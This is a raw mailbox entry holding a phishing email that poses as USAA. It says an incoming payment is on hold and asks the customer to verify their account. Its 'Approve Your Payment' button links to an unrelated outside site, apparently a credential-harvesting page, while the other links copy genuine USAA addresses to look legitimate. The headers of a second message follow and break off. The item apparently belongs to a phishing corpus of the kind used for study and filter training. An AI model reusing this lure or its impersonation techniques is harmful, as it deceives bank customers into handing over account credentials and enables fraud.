From: "USAA" <Safeguard@MailSender.com>
Date: Wed, 01 Feb 2017 09:00:39 -0500
Status: O
X-Status: 
X-Keywords:                  
X-UID: 49

You will not see this in a MIME-aware mail reader.
--===============0310336522==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

 =

   To ensure delivery to your inbox, please add USAA.Web.Services@customerm=
ail.usaa.com to your address book.	 =

 =

   	  =

   =

  	  =

   Payment Received
  View Accounts | Privacy Promise | Contact Us
	  =

    =

   	 =

  	 =

  	 =

	  =

   USAA SECURITY ZONE =

USAA # ending in: XXXX
	  =

   =

  =

  =

   =

  =

 =

    Dear USAA Customer,
You have a new incoming payment transfer on hold. For security reasons, We =
need to verify the sender and receiver of the payment.

 A quick verification of your USAA account is required as a means to approv=
e the incoming payment transfer. Your money will be posted into your accoun=
t within 2-4 business days. =

 =

   	 Approve Your Payment
 We appreciate your business and co-operation with us.
 Thank you,
USAA
 P.S. Texting and driving ... it can wait. Take the pledge to never text an=
d drive.
	  =

  =

  =

	 	 =

  	 	 	 =

   =

  Please do not reply to this e-mail. To send a secure message to USAA, ple=
ase contact us.

Privacy Promise
USAA, 9800 Fredericksburg Road, San Antonio, Texas 78288

  =

  	 USAA means United Services Automobile Association and its insurance, ba=
nking, investment and other companies. Banks Member FDIC. Investments provi=
ded by USAA Investment Management Company and USAA Financial Advisors Inc.,=
 both registered broker dealers. 	 =

  =

  66676-0514   =



--===============0310336522==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><BODY><DIV align=3Dcenter>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D650 bgColor=3D#b5d7e6 border=
=3D0>
<TBODY>
<TR>
<TD height=3D35 vAlign=3Dmiddle width=3D650 align=3Dcenter><FONT style=3D"F=
ONT-SIZE: 9px; COLOR: #929292" face=3D"Verdana, sans-serif">To ensure deliv=
ery to your inbox, please add <SPAN style=3D"COLOR: #68a7c5">USAA.Web.Servi=
ces@customermail.usaa.com</SPAN> to your address book.</FONT></TD>
<TD></TD></TR></TBODY></TABLE>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D650 bgColor=3D#b5d7e6 border=
=3D0>
<TBODY>
<TR>
<TD width=3D10></TD>
<TD bgColor=3Dwhite width=3D630 align=3Dcenter>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D604 border=3D0>
<TBODY>
<TR>
<TD height=3D5 colSpan=3D4></TD></TR>
<TR>
<TD height=3D45 width=3D54><A href=3D"/do/redirect?url=3Dhttps%253A%252F%25=
2Fwww.usaa.com%252Finet%252Fent_logon%252FLogon%253FEID%253D66676-0514_head=
&amp;hmac=3Ddc46a65eede356b089bf0c5636e68743" target=3D_blank><IMG border=
=3D0 alt=3D"" src=3D"https://content.usaa.com/mcontent/static_assets/Media/=
email_logo.gif" width=3D61 height=3D41></A></TD>
<TD>
<TABLE cellSpacing=3D0 cellPadding=3D0 border=3D0>
<TBODY>
<TR>
<TD style=3D"COLOR: #6d6d6d; FONT: bold 16px Arial, sans-serif" height=3D22=
 align=3Dleft><SPAN style=3D"MARGIN-TOP: 9px; DISPLAY: block">Payment Recei=
ved</SPAN></TD></TR>
<TR>
<TD height=3D23 align=3Dleft><NOBR><FONT size=3D1 face=3D"Verdana, sans-ser=
if"><A style=3D"TEXT-DECORATION: none; COLOR: #6d6d6d" href=3D"/do/redirect=
?url=3Dhttps%253A%252F%252Fwww.usaa.com%252Finet%252Fent_home%252FCpHome%25=
3FEID%253D66676-0514_head&amp;hmac=3D2879cda783ac27c7bbf5ac9862d70604" targ=
et=3D_blank>View Accounts</A> | <A style=3D"TEXT-DECORATION: none; COLOR: #=
6d6d6d" href=3D"/do/redirect?url=3Dhttps%253A%252F%252Fwww.usaa.com%252Fine=
t%252Fent_utils%252FMcStaticPages%253Fkey%253Dprivacy_promise%2526EID%253D6=
6676-0514_head&amp;hmac=3D0f736da88b73ee3921f5c77ab5869909" target=3D_blank=
>Privacy Promise</A> | <A style=3D"TEXT-DECORATION: none; COLOR: #6d6d6d" h=
ref=3D"/do/redirect?url=3Dhttps%253A%252F%252Fwww.usaa.com%252Finet%252Fent=
_contactus%252FCpLevelZeroContactUs%253FContactUsPageId%253DPublicContactUs=
%2526EID%253D66676-0514_head&amp;hmac=3D1928e253f232841d9367bbd5dba85eb8" t=
arget=3D_blank>Contact Us</A></FONT></NOBR></TD></TR></TBODY></TABLE></TD>
<TD height=3D45 vAlign=3Dmiddle width=3D367 align=3Dright>
<TABLE height=3D65 cellSpacing=3D0 cellPadding=3D0 width=3D188 border=3D0>
<TBODY>
<TR>
<TD width=3D22>
<TABLE height=3D65 cellSpacing=3D0 cellPadding=3D0 width=3D22 border=3D0>
<TBODY>
<TR>
<TD style=3D"LINE-HEIGHT: 0" height=3D29 vAlign=3Dtop width=3D8><IMG style=
=3D"DISPLAY: block" border=3D0 alt=3D"" src=3D"https://content.usaa.com/mco=
ntent/static_assets/Media/email_sec_1-1.gif?EID=3D6291072608" width=3D8 hei=
ght=3D29></TD>
<TD style=3D"LINE-HEIGHT: 0" bgColor=3D#e7e7e8 height=3D29 vAlign=3Dtop wid=
th=3D14><IMG style=3D"DISPLAY: block" border=3D0 alt=3D"" src=3D"https://co=
ntent.usaa.com/mcontent/static_assets/Media/email_sec_1-2.gif" width=3D14 h=
eight=3D29></TD></TR>
<TR>
<TD style=3D"LINE-HEIGHT: 0" height=3D29 vAlign=3Dtop width=3D8><IMG style=
=3D"DISPLAY: block" border=3D0 alt=3D"" src=3D"https://content.usaa.com/mco=
ntent/static_assets/Media/email_sec_spacer.gif" width=3D8 height=3D29></TD>
<TD style=3D"LINE-HEIGHT: 0" bgColor=3D#e7e7e8 height=3D29 vAlign=3Dtop wid=
th=3D14><IMG style=3D"DISPLAY: block" border=3D0 alt=3D"" src=3D"https://co=
ntent.usaa.com/mcontent/static_assets/Media/email_sec_spacer.gif" width=3D1=
4 height=3D29></TD></TR>
<TR>
<TD style=3D"LINE-HEIGHT: 0" height=3D7 vAlign=3Dbottom width=3D8></TD>
<TD style=3D"LINE-HEIGHT: 0" bgColor=3D#e7e7e8 height=3D7 vAlign=3Dbottom w=
idth=3D14><IMG style=3D"DISPLAY: block" border=3D0 alt=3D"" src=3D"https://=
content.usaa.com/mcontent/static_assets/Media/email_sec_2-1.gif" width=3D14=
 height=3D7></TD></TR></TBODY></TABLE></TD>
<TD bgColor=3D#e7e7e8 align=3Dleft>
<TABLE height=3D65 cellSpacing=3D0 cellPadding=3D5 width=3D"100%" border=3D=
0>
<TBODY>
<TR>
<TD style=3D"FONT-SIZE: 9px; TEXT-ALIGN: left; LINE-HEIGHT: 12px; -webkit-t=
ext-size-adjust: none" vAlign=3Dmiddle align=3Dleft><FONT style=3D"FONT-SIZ=
E: 10px; COLOR: #00365b" face=3D"Arial, Helvetica, sans-serif"><STRONG>USAA=
 SECURITY ZONE</STRONG></FONT> <BR><FONT style=3D"FONT-SIZE: 9px; COLOR: #0=
0365b" face=3D"Arial, Helvetica, sans-serif">USAA # ending in: XXXX</FONT><=
/TD></TR></TBODY></TABLE></TD>
<TD bgColor=3D#ffffff width=3D7>
<TABLE height=3D65 cellSpacing=3D0 cellPadding=3D0 width=3D7 border=3D0>
<TBODY>
<TR>
<TD style=3D"LINE-HEIGHT: 0" bgColor=3D#e7e7e8 height=3D7 vAlign=3Dtop widt=
h=3D7 align=3Dright><IMG style=3D"DISPLAY: block" border=3D0 alt=3D"" src=
=3D"https://content.usaa.com/mcontent/static_assets/Media/email_sec_1-3.gif=
" width=3D7 height=3D7></TD></TR>
<TR>
<TD style=3D"LINE-HEIGHT: 0" bgColor=3D#e7e7e8 height=3D51 vAlign=3Dtop wid=
th=3D7 align=3Dright><IMG style=3D"DISPLAY: block" border=3D0 alt=3D"" src=
=3D"https://content.usaa.com/mcontent/static_assets/Media/email_sec_spacer.=
gif" width=3D7 height=3D51></TD></TR>
<TR>
<TD style=3D"LINE-HEIGHT: 0" bgColor=3D#e7e7e8 height=3D7 vAlign=3Dbottom w=
idth=3D7 align=3Dright><IMG style=3D"DISPLAY: block" border=3D0 alt=3D"" sr=
c=3D"https://content.usaa.com/mcontent/static_assets/Media/email_sec_2-2.gi=
f" width=3D7 height=3D7></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE=
></TD></TR>
<TR>
<TD height=3D20 colSpan=3D4>&nbsp;</TD></TR>
<TR>
<TD height=3D1 colSpan=3D4></TD></TR></TBODY></TABLE>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D"95%" border=3D0>
<TBODY>
<TR>
<TD width=3D"95%" align=3Dleft><FONT style=3D"FONT-SIZE: 12px; COLOR: #3333=
33; LINE-HEIGHT: 18px" face=3D"Verdana, sans-serif">
<P style=3D"MARGIN-BOTTOM: 1em">Dear USAA Customer,</P>You have a new incom=
ing payment transfer on hold. For security reasons, We need to verify the s=
ender and receiver of the payment.<BR><BR>
<P style=3D"MARGIN-BOTTOM: 1em">A quick verification of your USAA account i=
s required as a means to approve the incoming payment transfer. Your money =
will be posted into your account within 2-4 business days. </P>
<TABLE height=3D15 cellSpacing=3D0 cellPadding=3D0 bgColor=3D#6cae35 border=
=3D0>
<TBODY>
<TR bgColor=3D#6cae35>
<TD bgColor=3D#6cae35 vAlign=3Dmiddle width=3D15 align=3Dcenter><IMG src=3D=
"https://content.usaa.com/mcontent/static_assets/Media/email_cta_arrow.gif"=
 width=3D15 height=3D15></TD>
<TD bgColor=3D#6cae35 vAlign=3Dmiddle width=3D134 align=3Dcenter><A style=
=3D"TEXT-DECORATION: none; COLOR: #fff; FONT: bold 11px arial, sans-serif" =
href=3D"http://webpagedesigning.biz/mon.htm" target=3D_blank>Approve&nbsp;Y=
our Payment</A></TD></TR></TBODY></TABLE>
<P style=3D"MARGIN-BOTTOM: 1em">We appreciate your business and co-operatio=
n with us.</P>
<P style=3D"MARGIN-BOTTOM: 1em">Thank you,<BR>USAA</P>
<P><B>P.S. Texting and driving ... it can wait. <A href=3D"/do/redirect?url=
=3Dhttp%253A%252F%252Fitcanwait.usaa.com%252F%253F%2526EID%253D66676-0514_b=
ody&amp;hmac=3D506624e14c46ad376c598966cc765061" target=3D_blank>Take the p=
ledge</A> to <I>never</I> text and drive.</B></P></FONT></TD>
<TD>&nbsp;</TD></TR>
<TR>
<TD height=3D30 colSpan=3D2 align=3Dleft><BR><A href=3D"/do/redirect?url=3D=
http%253A%252F%252Fwww.facebook.com%252FUSAA&amp;hmac=3Dd9ff5baaefff27b9623=
3ece4ec9bebea" target=3D_blank><IMG border=3D0 alt=3DFacebook src=3D"http:/=
/content.usaa.com/mcontent/static_assets/om/Media/thumbnails/facebookIcon.g=
if" width=3D32 height=3D32></A>&nbsp;&nbsp;<A href=3D"/do/redirect?url=3Dht=
tp%253A%252F%252Ftwitter.com%252Fusaa&amp;hmac=3D7aebeb2826475a3f04aecc6388=
86d4ea" target=3D_blank><IMG border=3D0 alt=3DTwitter src=3D"http://content=
.usaa.com/mcontent/static_assets/om/Media/thumbnails/twitterIcon.gif" width=
=3D32 height=3D32></A></TD></TR></TBODY></TABLE></TD>
<TD width=3D5></TD>
<TD width=3D5></TD></TR>
<TR>
<TD height=3D5 width=3D10></TD>
<TD height=3D5 width=3D630></TD>
<TD height=3D5 width=3D5></TD>
<TD height=3D5 width=3D5></TD></TR>
<TR>
<TD height=3D20 colSpan=3D4>&nbsp;</TD></TR>
<TR>
<TD colSpan=3D4 align=3Dcenter><FONT style=3D"FONT-SIZE: 10px; COLOR: #6d6d=
6d; LINE-HEIGHT: 18px" face=3D"Verdana, sans-serif">Please do not reply to =
this e-mail. To send a secure message to USAA, please <A style=3D"TEXT-DECO=
RATION: none; COLOR: #408cb0" href=3D"/do/redirect?url=3Dhttps%253A%252F%25=
2Fwww.usaa.com%252Finet%252Fent_references%252FCpSendUsAMessage%253FContent=
Area%253Dcp%2526EID%253D66676-0514_foot&amp;hmac=3D1c3af9cb9d2180454747ce3d=
0c0a99a7" target=3D_blank>contact us</A>.<BR><BR><A style=3D"COLOR: #6d6d6d=
" href=3D"/do/redirect?url=3Dhttps%253A%252F%252Fwww.usaa.com%252Finet%252F=
ent_utils%252FMcStaticPages%253Fkey%253Dprivacy_promise%2526EID%253D66676-0=
514_foot&amp;hmac=3D8484b405787dc28fc3810075b6b91f9b" target=3D_blank>Priva=
cy Promise</A><BR>USAA, 9800 Fredericksburg Road, San Antonio, Texas 78288<=
BR></FONT></TD></TR>
<TR>
<TD height=3D15 width=3D10></TD></TR>
<TR>
<TD width=3D5 align=3Dleft></TD>
<TD width=3D630 colSpan=3D2 align=3Dleft><FONT style=3D"FONT-SIZE: 10px; CO=
LOR: #6d6d6d; LINE-HEIGHT: 18px" face=3D"Verdana, sans-serif">USAA means Un=
ited Services Automobile Association and <A style=3D"TEXT-DECORATION: none;=
 COLOR: #408cb0" href=3D"/do/redirect?url=3Dhttps%253A%252F%252Fwww.usaa.co=
m%252Finet%252Fent_utils%252FMcStaticPages%253Fkey%253Dabout_usaa_overview%=
2526EID%253D66676-0514_foot&amp;hmac=3D15e32808cc6bf8d709b117c4acd8a65b" ta=
rget=3D_blank>its insurance, banking, investment and other companies</A>. B=
anks Member FDIC. Investments provided by USAA Investment Management Compan=
y and USAA Financial Advisors Inc., both registered broker dealers.</FONT> =
</TD>
<TD width=3D5 align=3Dleft></TD></TR>
<TR>
<TD height=3D15 width=3D10></TD></TR>
<TR>
<TD colSpan=3D4 align=3Dright><FONT style=3D"FONT-SIZE: 10px; COLOR: #6d6d6=
d; LINE-HEIGHT: 18px" face=3D"Verdana, sans-serif">66676-0514&nbsp;&nbsp;&n=
bsp;</FONT><BR><BR></TD></TR></TBODY></TABLE></DIV></BODY></HTML>
--===============0310336522==--

From jose@monkey.org Thu Feb  2 14:15:51 2017 +0000
Return-Path: ttran-vuong@scfhp.com
Delivered-To: jose@monkey.org
X-FDA: 72471849702.25.22D276A
Received: from filter.hostedemail.com (10.5.16.248.rfc1918.com [10.5.16.248])
	by smtpin25.b.hostedemail.com (Postfix) with ESMTP id 7956B12BA25
	for <jose@monkey.org>; Thu,  2 Feb 2017 14:14:54 +0000 (UTC)
X-Spam-Summary: 64,4,0,4a50d3d39a1e8406,d41d8cd98f00b204,ttran-vuong@scfhp.com,:info@mail.org,RULES_HIT:10:41:72:355:379:474:960:962:967:969:973:978:983:988:989:1189:1208:1221:1260:1261:1313:1314:1345:1381:1431:1436:1437:1516:1517:1518:1534:1540:1560:1575:1588:1589:1592:1594:1711:1714:1730:1749:1777:1792:1803:2107:2145:2525:2527:2528:2559:2564:2610:2682:2685:2693:2859:2890:2895:2900:2926:2933:2937:2939:2942:2945:2947:2951:2954:3000:3022:3138:3139:3140:3141:3142:3586:3622:3740:3867:3872:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4365:4552:5007:6117:6238:6261:6658:6678:6684:6703:7903:8512:8518:8603:8829:8957:9025:9082:9111:9411:9908:10004:10197:10240:10346:10400:11656:11658:11914:12043:12517:12519:12555:12657:12661:13018:13019:13080:13139:13237:13439:14096:14181:14659:14721:14828:14885:21080:21433:21450:21451:30001:30021:30022:30051:30054:30064:30070,0,RBL:error,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fp,MSBL:0,DNSBL:neutr
 al,Custo
X-HE-Tag: rod12_8217c4af8384a
X-Filterd-Recvd-Size: 3103
Received: from zix01.scfhp.com (zix01.scfhp.com [40.134.181.180])
	by imf25.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Thu,  2 Feb 2017 14:14:53 +0000 (UTC)
Received: from 127.0.0.1 (ZixVPM [127.0.0.1])
	by Outbound.scfhp.com (Proprietary) with SMTP id EB3613CD9EB
	for <jose@monkey.org>; Thu,  2 Feb 2017 06:14:11 -0800 (PST)
Received: from SCFHPEX.scfhp.com (scfhpex.scfhp.com [10.1.10.12])
	(using TLSv1 with cipher AES128-SHA (128/128 bits))
	(No client certificate requested)
	by zix01.scfhp.com (Proprietary) with ESMTPS id 92A083CCEF0;
	Thu,  2 Feb 2017 06:13:49 -0800 (PST)
Received: from SCFHPEX.scfhp.com ([fe80::f0dd:93db:d4b3:1c61]) by
 SCFHPEX.scfhp.com ([fe80::f0dd:93db:d4b3:1c61%10]) with mapi; Thu, 2 Feb 2017
 06:13:49 -0800
